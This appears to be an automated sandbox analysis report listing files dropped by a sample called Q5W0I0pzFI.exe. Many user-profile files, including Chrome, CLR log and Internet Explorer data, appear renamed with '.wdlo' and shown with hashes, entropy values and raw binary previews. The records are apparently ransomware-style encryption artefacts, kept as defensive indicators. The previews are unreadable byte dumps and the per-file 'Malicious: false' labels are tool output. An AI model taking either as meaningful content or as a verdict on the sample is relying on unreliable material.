Preview:	......p.T..H?!QgO ...........q...Z..5....&..jGM.....Xe.8G.. .6.~....`.~..#.~`..v....^(.N..V..(/`D.a.....D\..SK.2P?.Ur.-.5...k..8..GQ.>.'....Wh.]UU$u\|T.......W..."..........".a.up..k.'.A.Zf..n.[....Q.D.sJd;:....8.%PBe...!.....p_..G..B.l..&.\1. b.../.<<I.N..zK.......C,..9...d.a.8....`[R..5...Q.O..6..[.g1.?.J..8.T...U.. &%.fSC..9.S..E..O.l.F......p0$...t.Z..ja.......M6..!z.>...7,X@.}*"h._>.k2.....n.J....i.<..f.v......Ot0.C..2.....GL).y.Q.Q....@.?...G.r..wn.E.,l$5..9.+...^-V...>.....;...\|......[J7.I.e..:..8Q\|R?.......[+v..b$.....mR.=O.\|+....W.$.+........A..@..7.tnk..f.....E...>...L.E.. Z...Y.../..x.}..8.N..BFe.4Z.dyJ&,B..,..7c.-..s~C:..[.H..x.i;........ g..h}..).le.wg.+.vM.....b...I.4..'3..+.....UX..m/...ZT...@>........T3._...7..#Mp......fW.B.F. ..k.....q.zG.%.<Ah7.:o..}....x..b..:.[..........P...![.:...R+....u<.O.....o..Y..9K.f....R.&.0.I^`...cSUBX.[_r..VB...h.L....,J90.r^kO..(N.Q?~...g..l..p.IO7...........{@..(...I..S...9"}....ai.C.+..c...+

C:\Users\user\Local Settings\Comms\UnistoreDB\USSres00002.jrs.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	3146062
Entropy (8bit):	0.6705391632389647
Encrypted:	false
SSDEEP:	6144:SR6MrfOMavWfX6R/XVxiinQ+Rzdbhl6mx2O:qzGUq1XVxJMO
MD5:	0982C3CBFF15515864D0C57081AD28D2
SHA1:	BFFB886E3A9D6E7D1B022A491A117CF651CBB3D3
SHA-256:	6FA85B112C3B73194E49EB6D064310A96B29D72B0747C90FDFA68877C047866D
SHA-512:	ACF4FA4B05FD1C30FC80CFD3016E8C94BD62A6273C1682DCA7DCE0ABB4D6E37B4F205D1671247A49C5EA407100D77543F3483E28ECECA4EBDF34021281EEC9F7
Malicious:	false
Reputation:	unknown
Preview:	.......`.....1.=...^oq...;....qi....eL..t]1..O...K...q.+.4...g..P.........;v-........Zh...{.".'...F...I....l@I...HQ..\|.5.&!u.=P..:s.S3t.....\.E..9.u?%7w.../$V.9.....0.%k....!....%..%1.3...%.z.C...dg..k..P.n...q'. 0...=.4..=.i.h..haV=GMc...r.\|.VX..(i......5......wC_.9:.....:......&..p..'............mM5l.;.`j.k.X....vL~.........M..y.../C....?.:.#..D.......4r...."......G.]..3...tL..R......Q9.].?&/F.h$0S....].Er.X!+V.....[..uf.....x+....D.l.>.F..A..y0..x.b.La..7..yo....pWe.......9...D...7...^^..p..1}....%.H..&>..?..\|..P..D/..].;......(....#..bsB..c.....%...\..U.I..(..T...-..A"9..'h.,z...y.b.../2ZF....Q>ZX...O.....5v[H...)..rC.1....@.F... ...h.=........8.d......X..".-..C.$<.....w.#[.RZS.B..@..v9....3....fY..m...h%...a....9z..._..!..N.'.O....Krh..}..~./6uI..B0>.....^.yrDwa!.....sl.p2.....z...=d..@j.$.C....(~0tO..!vr...A..-..Vu..6.%.'.....$.....'.OZWe.:.i+...p...8.;=.ywV....@u..f..bE.8.>.o..=D...k0..FK....m0./....G.t/.?y?..Y9....Z..l..Q...,.r

C:\Users\user\Local Settings\Comms\UnistoreDB\USStmp.jtx.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	3146062
Entropy (8bit):	0.6705186885463705
Encrypted:	false
SSDEEP:	3072:sCUSIyuUcnfnE9CmOnysrR9e9MIYcZ7lo5CMLYp8drj3:hUSv0fEDoywR9JCtW5drj3
MD5:	6B7A0B16594F49813B82DD40B1E6C695
SHA1:	FEA074026019AF7A5FD04A54AF1857EFDB70DF91
SHA-256:	FAC200A36301B00E83D61F2FDF68E554B02047DD47DF22801FFA0678000B1278
SHA-512:	CAA449074E2746138B8CE914E7F827B0BE4BB6C1376CDDD8CDE9C6A81BF624FF7754D8235D80DE071482E608615E8F36704831A8548BD742E21D3320C47227A8
Malicious:	false
Reputation:	unknown
Preview:	.......x!....WZ....J(......9"._B'<..^.B.......:..fv...@.,=..Da;..Y.C=.......?u.... ...dK..8..$$=jFs....fs......sw].p..fy.E..}$&.7$?.a-..L..~;]I...(QY...'..'..a..I..f..6.'.1.......#..r.4.'..Z..=..-...0.r9d..[.{.~.1.};W..e..e\|..fz...6.=-Q.\/.0......~I.....\.M..9..iC...P.P...I...C....6...%K...s...%."k..m..766v.6...'...u....2.....ZfU....E.B4.-c3..[%j.V{.`.8t[....Hl..fO....z.!?rGP..i..J..e.\YI.m9>s.N..b...`..~....EOg....~g....."E...4.. ..YF..9..G...0..g.E......rn}.R.......I7#8....I.......;.@!s"E.x.HC.h.li.X.........^[.....)c..gn?.f...b....f."...h..R.."&~..<....c..~...!.k']:A..ep.....9i:.##.%.\|D..6..\..G.W(.hM..]..)B.P....;.....BF.1Qy.B..dcs..>.w.i$@I.....=t[...,Z.._.K.C..[d..".....}.../.b....!y..4.?.T..4..2W.0....h.>.$....\|.%d..6.\|....U..4..Eu.:..%.s..n.._b...S.".x.!.xE........goKzZ....(......%.i...Ezb.\|..M..\|...$....rN...MhR...&e.....@..HT.Q\A.x.\...t...>..;.\....4.4..C..vc..m.z..EB..."..jY/.p..'."jy.-.^...W+(.D7..`.3$..At~]...WLu..;........X

C:\Users\user\Local Settings\ConnectedDevicesPlatform\CDPGlobalSettings.cdp.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	2323
Entropy (8bit):	7.907478192997456
Encrypted:	false
SSDEEP:	48:XxeqhAuS0AHy2hVmDhNrAOLnNeEL6V2rOZHle2CtYHHKCDIX/B8zMkHGj0ygkqXo:XxeqhAuS5S26NNUOpLKTeBCDIX/OMcaL
MD5:	BA6382AD341E3179FFE8F7436D541711
SHA1:	0A7B818954BE087629A2BBFB4AF6335B3026E363
SHA-256:	B5F59C68953319EBF8A74EEA9A82CDEA4FF118839CC595E5B87FA641911872DF
SHA-512:	280C41ADAD47282AB1271208F12531F49517430105E00D6FCB5B2C17A047912B8FD78CA8A0502EFD5763734A577148336E0FB481E4298C52C3829C2F82A0E1B4
Malicious:	false
Reputation:	unknown
Preview:	.{.....2.\|.:...o1...y.f.j)j.(...S..P.U.9....8..I..a,.K...K.........9....G.>5.,...\|...2_..k..`.5.(...xC.{.....,C...I..u.E2....yjmE..VG.D;..)G...z].}.Q.0......n......=..8C:.J.....+.W.7...i.8.p.>Z(.(..8.........@...iH.u.R....2A..[.......q...........!.+...ao.#.-... K..V6.. ......./.?7K...6p@.8.t..8..GP.~7Cy.&"8....w.....!).z...]@....."....LL.......M2......f.....%.... ......`.N.v.S.k.\|v.0....~b.....$.....J...,.+}.Q.1U..7.W.;[....-...5(`..W.....M..A.....1.?.FJF0?A]....7+...,y%^.....kK...j.Y^......T...gV..z2B!..(.vlH=z.....b.t....&..x-.9hx.c.j..h .PI..~..D.....Je.P7...uL,7Bp.K.j.M.F..%.v.^.y^iw.f....1aa4A.v...8.iR...(....5...........H..eb1+.'Zu ..;.&.rS...&..''dK...,...\|.+..h.g..G....qK....=.L.F.M..(.'u<.G+..[[..>"......'.I:.T..'<e..)..(... .~2j....Q..<..b'B........7.'i\c.2.NTv...F..."C..e..{..t.6B...)h.Qw.`}....iZ4..o&x^..yi.....5..,uY......F..........e.dJ.7...)nC.h .......k."{...@h...E..k.H..Rh@..5A..u..Ei....}...^.+...D...S.

C:\Users\user\Local Settings\Google\Chrome\User Data\CrashpadMetrics-active.pma.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1048910
Entropy (8bit):	1.7687944203996426
Encrypted:	false
SSDEEP:	6144:g/naVKZPBHxGinO+E+tCxt5BrPkiRscnwa:g/nQapxG2nEtxZPkiec
MD5:	F1D9E59DF998FC09F2D3D5A16586178E
SHA1:	4FCB574114B8B4DDF5E67B85E73C740DC5060637
SHA-256:	BC9082BB4249C8DDED336D152E8DB4B258F26F7A79CC61553FEC4F6C2804A362
SHA-512:	B66C7CB5F74BCDCC2444940B8EB3A082B95437CA7993951FC1A1E40A0274FB03D2106433A5237FB3903629AFAB10E8E4B3972687444307E214AEB7835A4E725B
Malicious:	false
Reputation:	unknown
Preview:	...@.s4J....J.}i>,..i.5."G...<..v(..VYj..J..[..+.N.1.&.O..D..W.UK...o...t....l.]<<.<..Z..B...6..m.."o.X.MNK....3....9..H.......%?.D..9.0Tg........b...\|.S.M.$d...D7N..v.O]../.....#..........?..5qQ....;..:n.....Z9....CX....@\|@..m.;3.-N...u{.D.Y..R.M..RP.fdf...Db..3.....Mn.^G5H..J.....'Q.......1$ .\nu...>>....;..:.1...f....n@J...\|..k.R...)d.?...g..N.B.}HTF.\|YC~g..R..^....S....b..a...9...R<o...U..MZ6..q%@.Ey.>9(9b..n.....A?.e{....q.z..3=B~.C.>.u.u...N.]E<-.C...k.....W;?...:TP.C..tL~?x.<4.O.&...n)D{'B...g....3mk...(..$n.k.}g...1..O...:....K.H.=....M:._.".y.....w..........".m..."j..pp......B\|...6.g.qr.t.0.v!..&..6".v...........&.:..vq..7.8.4..G...:uET6...]+..K...\..).`...~nI..wnh+KM...Z....W....[.W.....x~..qH.G.u..K)...:........"...PBl..]+R"....2.I.}7.._.$....lu....9;..g.1v.d.]1-X/..\l..<0l.Us!j..........8...u..H..o...%.;M..Z.Prw..R?>W.-;x.#..[......!c.y.JCF.M.....~j.~....V..wY-........@.%.f$]8.. ....#.$.T.^F2x...4....~5...R...Q+.S...s{...?.xG1+.

C:\Users\user\Local Settings\Google\Chrome\User Data\CrashpadMetrics.pma.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1048910
Entropy (8bit):	1.768923436955694
Encrypted:	false
SSDEEP:	6144:7cDvRSo6QXXOPuP2Px2aG6maQUEHLV5Mvo:7cUlI/8dxQTEvo
MD5:	A4275E1DB611AB56BF6CFA9AB425626F
SHA1:	62EA3F49CA2C2405E47CFED0C0759C4D58613829
SHA-256:	9D82097AE0D828DE939DE7546C67322B5B32DBB59BEAB551CA348F67181E2E6E
SHA-512:	4E9FA649B872C4A3DC26AB743ED5D99ABE56A19BFA86DA37068279A56FEA314BE0968DDA5F8945625C64F6C1C8CF67A2DEA2B5109C535DBDAFFAA25E545F6CA0
Malicious:	false
Reputation:	unknown
Preview:	...@....4Z..gc....2...`=S....8q.c..Zc.H..uv....(..i.aV.H..B.f...'...a..3P..."/.;w.Ro.y.....:....R.....p`>....1$...'..a.Y..$..{..6..9{..D..l...%..!.a...........d...Ah..U.&._............+../...#.).x./.@.H...U0x..T..f..w.J.~a"..{.`...."..f.U.W...u.7.g.zD.nI .v<.+..^....../.+....1.Z./.;....2@i.2........^..:..q.LZ..{]b....A..y...3....<...]o.&H7.......<...[iL.bp......k...5.u.....6.....<<Z{9r....MV.7YN..}..H.QJ'SYM.......S.1m..=@.6<.pcR\|q:.Q.>...<.T.e......vs....h...#.....{...`.%...{..l&...X1,..sT..4...#Z.....1.1?..H..1.bRY'...E]?%..._m^..M.(.h.vz#%,...x....R;../).\>..=..(.hk]......vt..pAV.RS...!...OZDWm.B^XC=.UX..XA.....P.!._...{..v...QV(...n.C.kr./..m.7.s..oX.&g.....]I+.......B...%Q......7..,.@...$........=>X....$R....m...I........f....{.7$y..:...sR.q......'......7.[....3.J.-.p.9..0.(c.<......8/#.^Y ..4...)]....Mn....i.......'.D......;.1H.\|...5)..\-....GC.c.....-.H&..m.%...._R.+......... ...Thbp.w.1...6.'...?..f.TU.)A.^..Om..N4l...~.-.!.~ .....bj...RN.P

C:\Users\user\Local Settings\IconCache.db.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	16679
Entropy (8bit):	7.988902051714758
Encrypted:	false
SSDEEP:	384:JT71S+ZE6r97dFn+H8FM8vsRYUJ1W3EdDRu4:dhS+TRF+H8FM84nJSKDRx
MD5:	02A47D70577B9FC75B5E1012FB59EA04
SHA1:	67F6CDD5207BE73192C0E76382684F29FB6AF975
SHA-256:	B6BB0FA158264A3D1498FFE9DF57EAFC84B0B2B4226FE14017AD6BF5BBE7C93E
SHA-512:	E644B9F5FC652097A6EA284721DB0FD5BD9DE25D42902C002DA927722F350A7B97E8CD98ACE678676328D445A01F4D0B5C8F488D1766478D886D0AC95DECFEBF
Malicious:	false
Reputation:	unknown
Preview:	H...W:Y.`.ZI......y)EB.\|..j...I.5..Q.FFf)s.[)G.6.../<9.......d.j`...J.....&...+S.c."V.t...x......qv..[.........->a.w.n.I0gM:Q.....gyt.].....M....q.P../..:..hE5.....sH.I.S.k..;a.....b@.I.jV#@..Kh..=....9s..7.e.....m7.......K..7x..;v...oQ....xK.=;....Z............T..l..\..m..sUh.....4...I1..Z.mG.._..^.w{@......"]%^_...T.v...u.t.....B&.)..?.-l.N...KN...$.U"....MI.....-...T...D.[. .(g........3...Bw./.g.T....b..r ...E?&.~..B......8.X...=.....N...4..?I...w..~!P...../.:f....=.1_..o.L....}.MR.tc.U..(R..6!..v].L..j.4z9...Y...2SX...h....Ii.p.....O:...y..H....yT......X.U...C.f.1]......."L..e".....GEQ.Nm..5.'don<..{N..,.%.l.....q..{\#=...!f.LO...K0."d_..5...p\+XC.:....x+>.k..o....4.IT.R_a....9\|u.QNZ.J...C<.........;...a........_e.2c......l.m..(....x......6).1......oW...)T........"...3XRJJ.H......eN3.Th.#4F..>=\|v$q.z.e.-1C....K....y".....,..z.,.4..~+X...#$.-.R.9.v......L.ltz...............Z.\..W..eP+.=}.......(:...s..D...O.g...H..F_..F.^LSy..'.

C:\Users\user\Local Settings\Microsoft\CLR_v2.0_32\UsageLogs\unarchiver.exe.log.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	722
Entropy (8bit):	7.714750874446455
Encrypted:	false
SSDEEP:	12:QM+pVI1s+koC8uYY5B876fIWSjsSPTWoK/NvACv2luoPcjeZhD8LvXchWg35Mtw9:Sr+koC8uYogMRSTWJCCulyKzD87sWTy9
MD5:	2706405652998AE3D027759091CCC55B
SHA1:	29C90F6A322D43A6DDFDD448C25342940A4F3B66
SHA-256:	89E4CEA00500EBF7496ED1C9047C5713D985415E0BB60DEAF4C5915DEAB2F035
SHA-512:	4CC3EE6F7CD882B42E04AE03F990AF7EF78644481B36B00E7F575ECB06C5A3836B40EED4C65E1BDB1C9179679CB35CEFFA8748328731765DC289577910EB9423
Malicious:	false
Reputation:	unknown
Preview:	1,"fu..n.......lW....tf..K..m..mp..N....,.=k9.G.1...j..z.......q4.1.$...KGQ..j4I..o.5....`.Le.Jy..A..b...s.\|oG......n.y........]..g.G....1...^?t....Nv].m`c......Hm...`.......v.Ja..+.(........C...V...H....c..G.....nQ9..J.N0sx....4... ...CS{...x..u.4.MB...7.o.C.1.l_G.!=.OA...'........0...4...0...4=R.>B5&m....i.NA..<.../..h.K....?.I.B3....bq...:._..Y...I_............N..ZQ9bT"U.}..\...6.s..J.S.y.@....S..P2..c........f\|q!T.$;.p.....l,"MY.'.Q.>...OC.....9......r...H...Vi...\.L.L.sEF....H.D5...!..........M....p...!X.j=.d..y.$..IO#..^....T.. R....(...A...=8.d..N"..t.U`.yz.=.Uw...,.D...J.9I..@.....2..gl.A%.Aoj.#...8.xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\CLR_v4.0\UsageLogs\NGenTask.exe.log.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	976
Entropy (8bit):	7.791710367515923
Encrypted:	false
SSDEEP:	24:veNQP/JgbmpK9sFA2hHgABuPTlD6Cjz/jD/GxeWFbD:vNP/JgKpKdmebnjWVD
MD5:	FC5080D9903001C607443319234E0196
SHA1:	ED24E5593DC94A6D7F0B4352E5832E2C051B8815
SHA-256:	A20B8BD48FB3AF94E20459F9C7A3DD08A43467EF7EF7E0C838C330EEDC33AAAC
SHA-512:	0DB653844FC86206F590EC785A4C60EA61A2F418320A999FE480E62738A20B32D7A182AE5EB25D9DB621E1D7D9A344303CAC4A66E24B16B0F050E9570CBB6E1A
Malicious:	false
Reputation:	unknown
Preview:	1,"fu..1..X..21......~...c./..).U.m..T.....9.r.....~..K..&..em.b...._.H.pFD.!....._....n_6..D...2......TAV.<...a@!.....C.~.%5.v..Q.[.....r.GC2@....^nG.<g...:E<..F..../%)u{.\.....b~..7.......1..7C..?..Se.c....Y.1..qV.xql..^a.$....".Z..H&.j.Lz+..;....C_<..V..}.........<..0..R..4e........x#..'Sn..(...D..U;.(...1...v.......;j..................x#...XrY2N.P....y.-..7.-A.z.`.......+c...`......C9.(9u..Z..H1..j...U.c..[.[c./ .O......P..7)yVI+%..10Z.6."CT.......Xh.~:...z.5z.3.H...4H....F.%U.....E....L..+.Y0.....J.P.<l....M.i.wNi._../.m!.V.g......=.O.H..Dd:y9PQ...<S........j..A..y..0.@..+u..26.qL...&.wZ5.u.%.[..8.c..]YQ.G.d9.....f...._...)o...i..DfFO._6...f.......]..c-Uft^.....K..........R..iSX.....'.1it..A....R..8.%.+&..N...:...{w.....}...'.}.S.!.....}{....9.]ex_..$B.........M.G..p.SM..#8O'.>......B.E.!..v%...VL.M@.....K1.r.../..Ov.Z....y...Ff....>`\.I!.9xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\CLR_v4.0\UsageLogs\sdiagnhost.exe.log.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	6137
Entropy (8bit):	7.968931850137115
Encrypted:	false
SSDEEP:	96:QCFqLX0O/2afZyGQdCPOFvm8EAHP/qzyX+ut/T6MJFvT2cRSgZaKolljzB9Q92b9:QNDnb4FdvuAn3LrDJFvp7aRlRp3DBvN5
MD5:	CA41CD05921AE4AEEF476B80271BA1BC
SHA1:	6CFB473B07C6A8C21C5252B36D41F9C1E33B1452
SHA-256:	10A744191B1198826689FE14230CBCF618A5BD6380763DB0A82B338BAA07FD78
SHA-512:	A3A3AAA99DA8F3F86AC5431E70C87EC03D824261AA138B60F0892EAAC9D442705398A41AA0196AB3D1C78542BE1E4954AA0D84EB6F7B415BE56455D0213C9CEF
Malicious:	false
Reputation:	unknown
Preview:	1,"fuA...Xa5yxb,....cHm.p..e.!....82.j.uj.5r......K.4..8..i......P...c.......<..s.6gb)........w...(A...6....lW.I.j.U............V.+....K..,.....6j..8y.F08...{,..A..m9..W......>..z....2.0.>,.~{...;..}1.w..7....zQ...p..a..A9.+I^.~..HN..I(.L..A..].'.L@:....T...Q.>.2.q.m]..A.Z..........7.b.?... .b...B.\..?{.lL......M...ok.<-bQ...._3..D0T.]..z.....f`...,......k...5B.....GR.i.....6....f.hX.6XT.8A..<....l.u..z{.@U....QH....U.xD....}<.....\|.3.~..O(-T....\vW-..N....7.p......V.....Ed......(U.....V.A!.d@..H@.#.f.)+C.......Y\.......o_&.J..A.u........0.8cd..M9.}LWR.&..w.4,..fv...B."+....[u.......O..\X.G.\..$.q\t.....ZP.^G..x.v3.e..Y.0....}3QN...c+\.ea0....`D..\|.Ly....$jjNw-.l.........B.+..`...D........DD.(N=p.V1.......?..a.U9..'..E). M.^.5O....%2]}0..i..........l..B.Wr..6o..W&d..z\M..V'.Z.trc.xy@L <..:V.No`.!.. &.S...h.;....69.&.&y.G%K....A\2......../Q.%..];c+.}..n..M.r..g}...P.....dyRx.......Jq..t...w.P...<.$...+s...].:..b2S..3L+...8..b.....f

C:\Users\user\Local Settings\Microsoft\CLR_v4.0\ngen.log.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	669
Entropy (8bit):	7.677621185117862
Encrypted:	false
SSDEEP:	12:LSnE5HU9kN4G9V/X1I9DfmwnDyE44UEc2uJzK0AhhGJzKIiDj6Z3cii9a:L+E29kGsVNyDfmAv4z2YK0AhwJkWFbD
MD5:	D5624ECFE9766902128A8B5B3F905471
SHA1:	34BC67DECD1BCF3425E39FA64EC2F9DE280B7CA5
SHA-256:	5F9CF9D893D8C7499C38E1BBE0F15C2220D1603E4CCD0BB690C43422D0FA68EE
SHA-512:	20F95CA821B03A1DBDBFD4EB68D198F37AA84463D2F6C1C55879034037C37E15F6E524DC2D52AAF63D62246082F53712315DACADDEEC86C64D7FF794089B70D8
Malicious:	false
Reputation:	unknown
Preview:	.To....d...A.....{s.H...7..)....2w....g\.+%...!.......:i..Z..z.:...}aa;O!..WIK..F.=..GU..E.....w..N+.l.S.$....bQ}...Z........@%4..EW>c...pm..b..G<.<s.....`...;.v....m.d.+...\|.3..F....".j...6.....J0`..;.T..m.j..3[..T]..8.......u)I....1w.z5..F....{&.......S .hF...............`..=.c5.F.}...:.....H.pps........r..Jc.tl..eD..../..<...lm&P...Q....1..2...b"..H%....'.........=..P....V.i...]Dy .........5..\|[......l...m...@........x..).MW...m."5>.j.....>...2.E.......qW.u.b.\..E.. I..w\f+4H,......a~.G8.B....:6...".e.O.D..e.?+~^.&_."<b..3*..!..6.E"N..........cxbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\CLR_v4.0_32\UsageLogs\NGenTask.exe.log.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	7.786675673461144
Encrypted:	false
SSDEEP:	24:qebS6CK9DmgGUWd/tF64eGCORRgNtjWFbD:qebFCKBlCeGCORRgNtjWVD
MD5:	E68948D3982C55245DF3F54919DA5A8D
SHA1:	9483EE2ACCD6D4ADD36F9DA99CEE55DD741503A5
SHA-256:	DD6EF92C50FF8E9A0840582DF1023D37DA551D3880DBC5D32E2FD28B9F9CC08A
SHA-512:	69D36DAB1D977E63A0929A62A778A49A7805E64DE2A778A4ADBAA1C2E24A8DA7B8A4D0567F8EF5AC098BAFB8B8D33C3B87BEAB67185B69D3C5D61C789BF5D44A
Malicious:	false
Reputation:	unknown
Preview:	1,"fu.....Rg$...zC.d.}...^ nG..Y.&..;..3 .x.m......).+...8.......y.r.....}^.+3.....y.N....$.DL$...l&.....\|Rx..g.gL....=...t..^...x_.eP..........Q..s..O......N.../..#.ld'._..q.TqHe$g.U.....5c.B...J..!pXfmm.H......Y!.O..d....Ty.P...@g.........Y.rR.Oq.............0@.. ...+.M.B.".U..\)X^.[yW.9k._.>.......H...6.(nS...>Gb.,.wB .....l..x..7T.o..6....:......h..(...."(1.Ai.$.3.n.~..#....R...~.h..!k1B..-X......U...H.\z....+..I.@....h.~r.X2..6.V...r.......i...S.w.V.....H/......i...w....m..o.q%.0. l........J.SH....g...aH..\|..M^V.o.......t.Y.j...N.J.$.P..L..`../..&../>...K[..#....78.:r=.;?..ud..KO........).X......J..g....q.v./...&M)..O.6+...Zlz...g..>..9.".h......cc..oNmb...4.s#+.<...o.r....F.*..}...........4!...AM .~.9.\|...P...vZ..t'3..xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\CLR_v4.0_32\ngen.log.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	667
Entropy (8bit):	7.696052657859435
Encrypted:	false
SSDEEP:	12:qsOw+lNWO9ISlJV5dW1nsM6lylJBfqPn+sbjoFYSWvvujJ+8lFdPbzHbBXkLRftL:qLwi9SyNMNden/lLuxnHbNkLR8jWFbD
MD5:	A6474F020DD44CEF2F1754D0D11932A2
SHA1:	41457F70B0B7145A4C315DC3483D6CFD1AA0CFA9
SHA-256:	50E1E29B28ACD573BB576FF87F3896DAA308FF5D01B75EBD47800EAA665C0123
SHA-512:	0F959E6EC7FCD07EE0816A2425490244B8A2CBCE3F50DF6203ECB9884C1A67724C6CE74D8B1CDB7E4E6F016BFF248A601124EBA32C19ABAFBE26E2D251AE5B7D
Malicious:	false
Reputation:	unknown
Preview:	.To.d...F.;..rP..._.i[}..u....A.#....c...dj..`.+..D.D.@S.<.5.{...}1...ki.......?g\...U.S.....(..T0.,...~......U`..IO....mpe....P.....@..y.K..r....Av..+d2..CK..\>.H.1{..u..FQ,+...J.xtAk.A...Td.\..p.cX.0...V.~...SR..D.....B8.P~.4.e...4........n$].e.....y...FW...s..FC.W.NQ.......#.43.(K.A...V........x....D..4_`.R6;...@...Iwk..xt.P....&..%.P....#.........R..>.........:)..z...j.Ec...s.i.1. ...=S...W;..K<..m...Z.L....:38K.{..g..?..<..........f.....b<._..=g....,f.....7..?.3.I]_... g...:X.X.B...j^....}{.:s...oX./............4x...c.ho......".H.......+"..UxbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	234061
Entropy (8bit):	7.512009771468643
Encrypted:	false
SSDEEP:	3072:QnRBx4d/+eeen9KElf9o8grmxSyTpgd++TFlKxizq/j1I02G:YbCd/+de0Eh98cTgjTFlKxbbx2G
MD5:	2404FB82E04FE9727BADA7C53DD02ED5
SHA1:	8E215E6A94EFC8B8034812F9A1F1A74A8AEF8669
SHA-256:	25BD29F594B87F465C16343483784D88FD3DEE8809CB4F80E9BDC48355D976A6
SHA-512:	AA6258AA3616655CC926787D2976610B9E1A5EAD9E23CD62370FA4495451B57088D5CD19C806738BB0C3CE68695A773CF8F8376D5DAB2E6C8D8D0E565A5DEE45
Malicious:	false
Reputation:	unknown
Preview:	.<?]l..'c...2..,..P.?..a\j..2..hq.1CX/....h......6.....3.....e6.Z....`"2.C...].....!....M..K.q\On..(.-...n~}...._....T.[\@J..Q1:.6(E.../.._...2...B...W...mq$.g.u......?.9q2..."'....R8.l...^E .~I,K..D...nm\Y....E.............[..h.;.w..D~.R...>I.@5.z.........5y.q...y...lh.^`4...lo...r..{..G..A.H~p.....KD....6..DT...(.4\.\|.~ .[$.5.cw.z....K....t.U.....3...U<....jo.&.:....K.......=...)....{o.......R.;.>S...<.....%.5....;0.[$.'.Hq..Gb.).G..m..CoV...k!...Xz$.2.WD......q}\|.................aH.......3.R...^.mkH~..6d2.r.r.\#.%..Bz.s.. .g.f{3#.......\I.....<......&...S..;.E...c.A.2....B......j.w..b..ex.#>.&}.H.....]W...Jv..s..Dz-..........."." x.X...~e...F.)WJ<.L......6..(...S...t._PK......l+.Jk..`.2.p...........8Zb.p^.y.=..=.....p...{...P.a,..S..e..8.....;.-..(.....X....?r.`...q`M....=.w.P..(.H.U.....4Pl....Si..H...Fp^....w.-....v.C..0jxN...&.-....J...(K.!...~.[.Q...;..E~.....[..m...... h...4.. ...0..{R.~.r....\|..d..Z.E.y.....jQ.=`.......^P...y..

C:\Users\user\Local Settings\Microsoft\Internet Explorer\MSIMGSIZ.DAT.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	49454
Entropy (8bit):	7.995798559750658
Encrypted:	true
SSDEEP:	1536:dbJT82ooNmSCzNpEYGFjxh6BPmrkAeZaW1T:zT82o1CjXQ+krNF
MD5:	19996901E7A0D26431690F06C562F7F5
SHA1:	C4E5713377BABC076758C312C9B2298EABB21551
SHA-256:	1867B3CF49F6281D19B8182CEEF82AE95DAE8E4E743AF1570A4A030A2025F2B7
SHA-512:	E7D268AEA07B6245192FE3AB2177EFBD0B502869C14DFA79C7BBF50C10B25B9906008BFC9BBEBC6DB070A0AE3E424FDB5396D5A8CE8C043105A97260CE655083
Malicious:	false
Reputation:	unknown
Preview:	.....@K-(r.,.. ..m`^..kW/.....2.....Li].zd.Xm).g.D.C&..=g...r.U... ...'.(4o ..<........a...LJ.>...&,>PJ+S....-f\.F./!a.~'..1.T.C.....=......6...s1'....y.Rrq.os_.l.....x..b@..S/...>.....J...fp..&......Y..j..J.g.r........:..p.T.<...B.tm..G............2.P2....D...lS.......KC?e.Xz..uL....Z(=...a<..;.......;..c.pX.B]...BY.9-G..&b.L.f.0=.{.ux..F\Zd.9.B,...e.#j.a....<".6.w)rG 